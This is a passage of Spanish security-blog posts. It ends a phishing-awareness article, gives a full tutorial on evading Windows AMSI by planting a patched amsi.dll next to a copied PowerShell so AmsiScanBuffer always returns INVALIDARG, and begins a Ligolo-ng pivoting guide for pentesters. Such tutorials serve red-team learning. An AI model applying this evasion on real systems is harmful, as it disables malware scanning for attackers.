y robar información bancaria.</li></ul></div></span></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Con el fin de evitar la suplantación del correo electrónico, es altamente recomendable implantar técnicas de verificación, así como técnicas de vigilancia. El SMISHING se puede reducir con algunas de las medidas indicadas anteriormente, aunque nada de esto es realmente efectivo sin una concienciación en materia de ciberseguridad.</div></span></div></blockquote><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><ul><li><b><u>Suplantación como servicio:</u></b> se ha identificado la venta de conjuntos de contraseñas, números de teléfono, cuentas de correo de recuperación asociadas e información que puede utilizarse para saltar la autentificación multifactor de cuentas concretas, asegurando al atacante el acceso a estas y su robo.</li></ul></div></span></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Este tipo de técnicas son muy difíciles de mitigar, aunque es posible reducir este riesgo incluyendo listas negras en nuestro sistema de navegación.</div></span></div></blockquote><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Adicionalmente, es altamente recomendable establecer políticas de seguridad que promuevan el uso adecuado del correo electrónico corporativo (exclusivamente en el ámbito laboral), políticas de seguridad adecuadas que eviten la reutilización de contraseñas y promuevan su cambio periódico así como crear procedimientos para reportar correos electrónicos recibidos de dudosa fiabilidad.</div><div style="text-align: justify;"><br /></div></span><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Desde <a href="http://www.zerolynx.com/es">Zerolynx</a> defendemos el establecimiento de medidas de seguridad para evitar estos ataques, pero consideramos que el hecho de, llevar a cabo formaciones y la concienciación de los empleados y clientes puede mejorar la prevención, así como colaborar a que el impacto de estos ataques sea mínimo. Porque, a pesar de que no es posible exigir a los empleados el conocimiento en profundidad de las técnicas mencionadas, sí lo es el ayudarles a adquirir las herramientas necesarias para identificarlos y así evitar la materialización de estas amenazas.</div></span></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><p style="text-align: justify;"><a href="https://www.linkedin.com/in/noeliab/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;" target="_blank">Noelia B</a><span style="background-color: white; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; text-align: right;">., </span><i style="background-color: white; box-sizing: border-box; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none !important; text-align: right;">Analista de Inteligencia.</i></p></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-40297469651333343922023-11-06T08:30:00.010+01:002023-11-07T13:06:47.708+01:00Cómo evadir AMSI haciendo uso de DLL Hijacking<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUsRUKLO2NzvadBwowetC_YNC9kBgmN2dIMaLC7IJ5tQIGU3BYP9eo_VA1npAFAeiPhZ6_l8IQPVkDHgcQTbGN-sn4quKH6Y79XXEAzLL_aHNjTjJAOfPfDVxthbYAXRvi_QoyJp1MpVAmp61kIvXb5bSsw_2AmktP-zY2QVr9cAO2z-gF4JSLzS0CR9Dg/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(9).jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUsRUKLO2NzvadBwowetC_YNC9kBgmN2dIMaLC7IJ5tQIGU3BYP9eo_VA1npAFAeiPhZ6_l8IQPVkDHgcQTbGN-sn4quKH6Y79XXEAzLL_aHNjTjJAOfPfDVxthbYAXRvi_QoyJp1MpVAmp61kIvXb5bSsw_2AmktP-zY2QVr9cAO2z-gF4JSLzS0CR9Dg/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(9).jpg" width="640" /></a></div><br /><div style="text-align: left;"><br /></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">¡Muy buenas a todos! Hoy venimos con una última entrega (de momento) sobre el mundo del AMSI. En esta ocasión, vamos a descubrir cómo podríamos evadir el AMSI haciendo uso de una técnica llamada DLL hijacking. </span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">Cuando un binario está compilado con enlaces dinámicos, el sistema operativo buscará la DLL específica para cubrir una funcionalidad en tiempo de ejecución. En muchas ocasiones, el enlace a la DLL no se define con el path completo, sino únicamente con el nombre. </span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">Esto da pie a que Windows, mediante su modo de búsqueda, interprete cual es la DLL que el binario pretendía cargar en ese enlace. El orden de búsqueda es el siguiente:</span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: left;"><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">El directorio donde se encuentra la aplicación que se está ejecutando</span></li></ul><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">C:\Windows\System32</span></li></ul><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">C:\Windows\System</span></li></ul><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">C:\Windows</span></li></ul><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">El directorio donde se encuentra</span></li></ul><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">Todo lo que haya en la variable de entorno %PATH%</span></li></ul></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br />Por lo tanto, por culpa de este funcionamiento de Windows, cualquier persona con acceso de escritura en algún lugar del disco podría evadir AMSI. ¿Por qué? Porque si podemos copiar la PowerShell para tenerla en un lugar en el que tengamos permisos de escritura, y creamos un archivo llamado amsi.dll, en el momento que se abra esa PowerShell, cargará esa DLL por tema de preferencia. </span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br />En el siguiente ejemplo podemos ver cómo, teniendo la PowerShell en un sitio como el escritorio, podemos hacer que cargue amsi.dll de ese mismo sitio.</span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP7e3BjehNQ3qFuGNmrxPqzwHO4lqhyphenhyphenT21Ka8gxi5xVdVKT0oUdVdbIU8Q1bcgPfQ1-kH0BnK-dDtsobgMhC7RFcfn_AdhE4XccxE19YGWQbIL8KAav0sEBYT2xhJw5F897CZk8dyk50QtBPPXtQeS8Y4g3p7PYZimhCztUnLuXJNvI41hDAOaGnn7EtQ0/s709/1%20PowerShell%20carga%20amsi%20dll.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="405" data-original-width="709" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP7e3BjehNQ3qFuGNmrxPqzwHO4lqhyphenhyphenT21Ka8gxi5xVdVKT0oUdVdbIU8Q1bcgPfQ1-kH0BnK-dDtsobgMhC7RFcfn_AdhE4XccxE19YGWQbIL8KAav0sEBYT2xhJw5F897CZk8dyk50QtBPPXtQeS8Y4g3p7PYZimhCztUnLuXJNvI41hDAOaGnn7EtQ0/w640-h366/1%20PowerShell%20carga%20amsi%20dll.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div><div><span style="font-family: Barlow Semi Condensed;">El único requisito para utilizar esta técnica es tener una DLL (creada en C/C++) que tenga las funciones definidas de la misma manera que la DLL real. Es decir, no es necesario que la funcionalidad sea la misma, pero de cara a la PowerShell, la llamada a la función se tiene que dar de la misma forma: con el mismo nombre y los mismos argumentos.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">PowerShell de 64 bits se puede encontrar en el siguiente directorio:</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">C:\Windows\System32\WindowsPowerShell\v1.0</span></li></ul></div><div><span style="font-family: Barlow Semi Condensed;">Mientras que PowerShell de 32 bits se puede encontrar en el siguiente directorio:</span></div><div><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">C:\Windows\SysWOW64\WindowsPowerShell\v1.0</span></li></ul></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">Una forma sencilla de realizar esta tarea es mediante el parcheo de la DLL original. En otras palabras, podríamos tomar amsi.dll y cambiar las instrucciones pertinentes para que se pierda la funcionalidad original, y no devuelva nunca que hay <i>malware</i>.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">Anteriormente en el post <a href="https://www.flu-project.com/2023/10/FuncionesAMSI.html">Funciones AMSI </a> explicamos para qué servía cada función de AMSI.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">Sabemos que AmsiScanBuffer devuelve un HRESULT, que es un código que representa si la función se ha ejecutado de forma exitosa o no. Si cambiamos AmsiScanBuffer para que siempre devuelva 0x80070057, AMSI dejará de funcionar y lo habremos evadido.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">La siguiente imagen es una parte de la función AmsiScanBuffer. </span></div></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwxxB_V2-ruUfY9eIkZtv3Rd6BW0qE8_7UB4vVYRk2W2NSXc48s50aIPKmkSqnJjxAF7xsMyfHcNc87IXXbo5BzgAeavRc0W9KG5AatqHhtikdJYVpPvVAPdmv1eVmuHSFuYwu8-qjlM6Ih4t7bmQlBgRlk9wjByFqDv7vLK70YjSeV-v7PiS115LXd5Wx/s573/2%20funci%C3%B3n%20AmsiScanBuffer.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="272" data-original-width="573" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwxxB_V2-ruUfY9eIkZtv3Rd6BW0qE8_7UB4vVYRk2W2NSXc48s50aIPKmkSqnJjxAF7xsMyfHcNc87IXXbo5BzgAeavRc0W9KG5AatqHhtikdJYVpPvVAPdmv1eVmuHSFuYwu8-qjlM6Ih4t7bmQlBgRlk9wjByFqDv7vLK70YjSeV-v7PiS115LXd5Wx/w640-h304/2%20funci%C3%B3n%20AmsiScanBuffer.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">El primer <i>if</i> hace una serie de validaciones básicas y si las cumple, significa que los argumentos se han proporcionado de forma inválida y no se podrá realizar el escaneo, por lo que setea uVar2 a 0x80070057. </span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">Pero ¿Qué pasaría si dentro del <i>else</i> también se setea uVar2 a 0x80070057? La respuesta es que AMSI dejaría de funcionar correctamente, porque, a pesar de que AMSI se comunique con Windows Defender para enviar el buffer, si la función devuelve INVALIDARG, el comando se ejecutará de forma normal.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">En ensamblador, para devolver un valor en un return, debemos cargar el contenido en un registro de retorno, por lo tanto, para devolver INVALIDARG, podríamos añadir lo siguiente:</span></div><div><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">MOV EAX,0x80070057</span></li></ul></div><div><span style="font-family: Barlow Semi Condensed;">Si utilizas <i>ghidra</i>, seleccionando en la parte del <i>decompile</i>, la parte que nos interesa, podemos ver dónde se encuentra su ensamblador correspondiente. Para parchear esta función y que siempre devuelva INVALIDARG, podemos cambiar el último <i>call.</i></span></div></div><div><i><span style="font-family: Barlow Semi Condensed;"><br /></span></i></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG9xQ2EtYvERbumSQnY6xPWhlIpjRdgMoiNmkbDr39O81i9FwSWE-turmK-vypJ50A0h_KGV2wLX7gieZOYWdoUwT8WKcqHmPtqYWLjp2U-2Gpzb9QoK0oxAwW8jFm0ESbJ-xjObKW00RJ03ekHel6leO2o6WWadQ4IfAruzgxZzbU5vVbjm1ZSPCSRUO6/s709/3.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="309" data-original-width="709" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG9xQ2EtYvERbumSQnY6xPWhlIpjRdgMoiNmkbDr39O81i9FwSWE-turmK-vypJ50A0h_KGV2wLX7gieZOYWdoUwT8WKcqHmPtqYWLjp2U-2Gpzb9QoK0oxAwW8jFm0ESbJ-xjObKW00RJ03ekHel6leO2o6WWadQ4IfAruzgxZzbU5vVbjm1ZSPCSRUO6/w640-h278/3.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">Por lo tanto, la función quedaría como la siguiente:</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEysEW-uF9BrW8d9lOezmAP9eNj8E3YnQcF8HtjPxNSGH2_ECpeyO8to_qqE688L9MFU4xjVQigpx6vSS23lrkbiBVzsvAFFMtcD4POhRbXlHmHAAWSvcT_izHAzJN5t_7bg_4ISm2rIXKjcQ3UECUu-29FQlTtKa7NY4I9LzTd4Iuv9O4qasiEs5lzspW/s591/4%20funci%C3%B3n.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="226" data-original-width="591" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEysEW-uF9BrW8d9lOezmAP9eNj8E3YnQcF8HtjPxNSGH2_ECpeyO8to_qqE688L9MFU4xjVQigpx6vSS23lrkbiBVzsvAFFMtcD4POhRbXlHmHAAWSvcT_izHAzJN5t_7bg_4ISm2rIXKjcQ3UECUu-29FQlTtKa7NY4I9LzTd4Iuv9O4qasiEs5lzspW/w640-h244/4%20funci%C3%B3n.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="font-family: Barlow Semi Condensed;">Por último, quedaría exportar la DLL como PE y ya estaría.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4wa8IdaRC-Y6q83uRtke9_1iUE0yW3Ql1Pm9Dyz0f7DfqZBZm7eI1_JY202V8bfTezXPRlPA-95J8elaDzMYygb9QQhyphenhyphen3igLWSsjAA8q7UTkyYkk0Uic1MDbcs8MSiST1U7B0izbQXBJhVxLiLnw9vVpcPXtl33yfKis59nXWTBV2ByijhW-2e5dg84Dv/s709/4%20exportar%20DLL%20como%20PE.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="353" data-original-width="709" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4wa8IdaRC-Y6q83uRtke9_1iUE0yW3Ql1Pm9Dyz0f7DfqZBZm7eI1_JY202V8bfTezXPRlPA-95J8elaDzMYygb9QQhyphenhyphen3igLWSsjAA8q7UTkyYkk0Uic1MDbcs8MSiST1U7B0izbQXBJhVxLiLnw9vVpcPXtl33yfKis59nXWTBV2ByijhW-2e5dg84Dv/w640-h318/4%20exportar%20DLL%20como%20PE.png" width="640" /></span></a></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><span style="font-family: Barlow Semi Condensed;">Y con esto nos despedimos de <a href="https://www.flu-project.com/2023/09/IntroduccionAMSI.html">AMSI</a> por el momento. Si os habéis quedado con ganas de más, ¡escribidnos!</span><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><br /></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div><div style="text-align: center;"><a href="https://www.linkedin.com/in/klego/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "open sans", sans-serif; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Justo Martín</a><span face=""open sans", sans-serif" style="background-color: white; box-sizing: border-box; color: #212529; outline: none; text-align: right;">, </span><i style="background-color: white; box-sizing: border-box; color: #212529; font-family: "open sans", sans-serif; outline: none; text-align: right;">Security Analyst at <a href="https://www.zerolynx.com/es/" style="box-sizing: border-box; color: #1e71b8; cursor: pointer; outline: none; text-decoration-line: none; transition: all 0.5s ease 0s;">Zerolynx</a></i><span face=""open sans", sans-serif" style="background-color: white; box-sizing: border-box; color: #212529; outline: none; text-align: right;">.</span></div></div></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-65331547751177798422023-10-30T09:25:00.005+01:002023-11-07T13:07:30.080+01:00Ligolo-ng, pivoting avanzado de la mano de Go<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigdLRxhG78bTPTsf9_H-mQBAnLSXzyzscvqXJ-dd3-8NoqxXMprHCpkOI7B3ugJtnumCMubc8ZLLwcCfTwctRtmDWxjKcyueeOcjtzoA5UGF97E-nHVvtoToybScfBFe_JGVsVkxSUYvgUY_4-_FtoevMaYyoVmIFr8pvStxu5iyrDiX5pgKGa4sKUBU4w/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(8).jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigdLRxhG78bTPTsf9_H-mQBAnLSXzyzscvqXJ-dd3-8NoqxXMprHCpkOI7B3ugJtnumCMubc8ZLLwcCfTwctRtmDWxjKcyueeOcjtzoA5UGF97E-nHVvtoToybScfBFe_JGVsVkxSUYvgUY_4-_FtoevMaYyoVmIFr8pvStxu5iyrDiX5pgKGa4sKUBU4w/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(8).jpg" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Muy buenas, durante esta entrega hablaremos de una herramienta que facilita mucho la temática de los túneles. ¡No os perdáis en él! .</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Ligolo-ng</b> es una herramienta simple, ligera y rápida que permite a los pentester establecer túneles desde una conexión TCP/TLS inversa utilizando una <b>interfaz virtual “tun” </b>(sin necesidad de SOCKS). A diferencia de Chisel u otras herramientas, con Ligolo-ng no necesitamos hacer uso de SOCKS, si no que mediante interfaces virtuales levantaremos un túnel (al más puro estilo VPN).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Gracias a esto, podremos correr herramientas como Nmap sin tener que usar proxychains, por lo que las tareas de pivoting se vuelven más sencillas y rápidas, ya que una de las ventajas de Ligolo-ng es una significativa mejora en el rendimiento de las conexiones frente al uso de SOCKS. Tendremos conexiones más rápidas y estables. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A continuación, os detallamos cómo usar esta herramienta correctamente:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h2 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Get-ready</span></h2><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Agent</b> – Máquina víctima</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /><b>Proxy</b> – Máquina atacante</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En primer lugar, descargaremos en nuestro directorio de trabajo los binarios que vamos a necesitar. Os dejamos el <a href="https://github.com/nicocha30/ligolo-ng" target="_blank">repositorio oficial de Ligolo-ng:</a> .</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"> <br />Tenemos la posibilidad de descargar el código fuente o el binario ya compilado, por comodidad en este caso, descargaremos tanto el binario del agente como el del proxy en función de los sistemas operativos que vayamos a emplear (en nuestro caso Linux):</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br />En el caso de optar por descargar el código fuente (GO), usaremos los siguientes comandos para compilarlo:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">Linux:</span></b></div><div style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;"><br /></span></b></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXpT83Rs13nka0l6dKzZ7C0v0CG3kRWkDrxoYrP_d_fpnDS5aAboyee4rPkrdor3S2HHJEFzdmhay0BD5_PSHDcgC_E3TBpYe_yIm3WZg4f1KLN8H0f0r4puE8Ha3QHA4Z2pdcl7mybwzAyGDcYiHOtygGgSduk9DI6T-sF3gePX8vOacpaj-i8rc1bWzE/s2067/Linux.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="437" data-original-width="2067" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXpT83Rs13nka0l6dKzZ7C0v0CG3kRWkDrxoYrP_d_fpnDS5aAboyee4rPkrdor3S2HHJEFzdmhay0BD5_PSHDcgC_E3TBpYe_yIm3WZg4f1KLN8H0f0r4puE8Ha3QHA4Z2pdcl7mybwzAyGDcYiHOtygGgSduk9DI6T-sF3gePX8vOacpaj-i8rc1bWzE/w640-h136/Linux.png" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;"><br /></span></b></div><div class="separator" style="clear: both; text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">Windows: </span></b></div><div class="separator" style="clear: both; text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;"><br /></span></b></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiILf_nnAQnzp6wdyuEVXtu_GpU_naI5SekK9cVMD8kWbnWCdFPNP7MtvW6_RjyQ2sRyjANABdhlzT8gklhVkeSshV2mSN32i0LeeAgJcyOnSMUuydfTBfaf2yX5CNIZBWczxlSReW0mAdcoanhV6PAE6CDBG5dWC0z3jK_XlYUzZJpslKGmoJIAdlfuKD0/s2067/windows.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="437" data-original-width="2067" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiILf_nnAQnzp6wdyuEVXtu_GpU_naI5SekK9cVMD8kWbnWCdFPNP7MtvW6_RjyQ2sRyjANABdhlzT8gklhVkeSshV2mSN32i0LeeAgJcyOnSMUuydfTBfaf2yX5CNIZBWczxlSReW0mAdcoanhV6PAE6CDBG5dWC0z3jK_XlYUzZJpslKGmoJIAdlfuKD0/w640-h136/windows.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><h2 style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Configurar Ligolo-ng:</span></h2><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ligolo-ng se basa en una interfaz virtual a través de la cual se establecerá un túnel entre la máquina víctima y la atacante, es por ello por lo que será necesario levantar primeramente la interfaz “tun” sobre la que se apoya Ligolo-ng:</span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtVI8T-T1MWru1NpfM8hIhOoYddQGxeSHIIViPmxnBYwaJuWs5twZ4XLgALr9YncMNjArDhm1CGSwtVLFrtgYuqHYWhHEWGVZth0lonuNVGcKdpZ-dKnMacwdB-P5Mah_zEseA5mE4Oni1ab4a63al2GkcnegNyjiUQp5p7w0jGFtZE0OeU0nNJf3Rdgey/s2067/Configurar%20Loigolo-ng.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="437" data-original-width="2067" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtVI8T-T1MWru1NpfM8hIhOoYddQGxeSHIIViPmxnBYwaJuWs5twZ4XLgALr9YncMNjArDhm1CGSwtVLFrtgYuqHYWhHEWGVZth0lonuNVGcKdpZ-dKnMacwdB-P5Mah_zEseA5mE4Oni1ab4a63al2GkcnegNyjiUQp5p7w0jGFtZE0OeU0nNJf3Rdgey/w640-h136/Configurar%20Loigolo-ng.png" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="margin: 0cm 0cm 0cm -0.25pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Consultamos las opciones
que nos ofrece el proxy:</span></div><p class="MsoNormal" style="margin: 0cm 0cm 0cm -0.25pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><o:p></o:p></span></p><p class="MsoNormal" style="margin: 0cm 0cm 0cm -0.25pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqltKrMluAs3v2QGrRyT4nM3ogBnbX44RgNf6NQpHaiYKoShMTepS43Q3T3G1Tow9nm-TzjL2WAOf3wCeeiIgHuhR_lVo64LjJ2YST7ALRTzH4OWhyphenhyphentlDQ-6ykWZyih14LK3o8S0E0WsN5Yo9e4F09BPmkcmJwU1t2svU1MyiRHKUYl3mwSokGVVoW41Kf/s2067/proxy.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="196" data-original-width="2067" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqltKrMluAs3v2QGrRyT4nM3ogBnbX44RgNf6NQpHaiYKoShMTepS43Q3T3G1Tow9nm-TzjL2WAOf3wCeeiIgHuhR_lVo64LjJ2YST7ALRTzH4OWhyphenhyphentlDQ-6ykWZyih14LK3o8S0E0WsN5Yo9e4F09BPmkcmJwU1t2svU1MyiRHKUYl3mwSokGVVoW41Kf/w640-h60/proxy.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><div class="separator" style="clear: both; text-align: justify;"><a 